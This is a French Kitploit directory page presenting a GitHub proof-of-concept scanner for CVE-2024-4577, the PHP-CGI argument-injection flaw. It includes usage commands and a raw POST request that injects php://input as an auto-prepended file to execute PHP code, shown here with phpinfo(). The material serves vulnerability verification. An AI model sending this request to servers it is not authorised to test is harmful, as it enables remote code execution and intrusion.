Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4577-PHP-RCE — PoC RCE PHP pour CVE-2024-4577 écrit en bash, go, python et un template nuclei | Kitploit
Outils/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PoC RCE PHP pour CVE-2024-4577 écrit en bash, go, python et un template nuclei

Voir le dépôt
33132il y a 1 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PHP RCE PoC

CVE-2024-4577 : Injection d'argument dans PHP-CGI

Aperçu

Ce dépôt contient des scripts pour vérifier la vulnérabilité CVE-2024-4577, un problème d'injection d'argument dans PHP-CGI. Vous pouvez utiliser les scripts Bash, Go et Python fournis pour tester une liste de domaines pour cette vulnérabilité. J'ai également publié un fichier YAML Nuclei.

Utilisation

Script Bash

Pour utiliser le script Bash, exécutez la commande suivante :

root@kitploit:~
./CVE-2024-4577.sh /path/to/domains-list

Script Go

Tout d'abord, enregistrez le script Go dans un fichier nommé CVE-2024-4577.go. Pour compiler et exécuter le script Go :

  1. Compilez le script Go en un binaire :

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  • Exécutez le binaire avec le fichier de liste de domaines en argument :

    root@kitploit:~
    ./CVE-2024-4577 /path/to/domains-list
    
  • Script Python

    Tout d'abord, enregistrez le script Python dans un fichier nommé CVE-2024-4577.py. Pour exécuter le script Python :

    1. Assurez-vous que la bibliothèque requests est installée :

      root@kitploit:~
      pip install requests
      
    2. Exécutez le script Python avec le fichier de liste de domaines en argument :

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list
      
    3. (Optionnel) Si vous souhaitez n'afficher que les hôtes vulnérables :

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list --quiet
      

    Explication de la preuve de concept (PoC)

    Pour tester manuellement la vulnérabilité, vous pouvez envoyer la requête POST suivante :

    root@kitploit:~
    POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
    Host: {{host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Accept: */*
    Content-Length: 23
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    
    <?php phpinfo(); ?>
    

    Modèle Nuclei

    J'ai également créé un modèle Nuclei pour scanner les instances vulnérables ; il utilise le schéma v3 et a été testé dans un environnement de laboratoire :

    root@kitploit:~
    nuclei -t CVE-2024-4577.yaml -u <target-url>
    

    Exemple de liste de domaines

    La liste de domaines doit être précédée de http/https pour être lue correctement.

    root@kitploit:~
    http://example.com
    http://testsite.com
    http://vulnerablesite.com
    

    Exemple de sortie

    Si un domaine est trouvé vulnérable, la sortie sera :

    root@kitploit:~
    http://example.com: Vulnerable
    http://vulnerablesite.com: Vulnerable
    
    Télécharger l’outil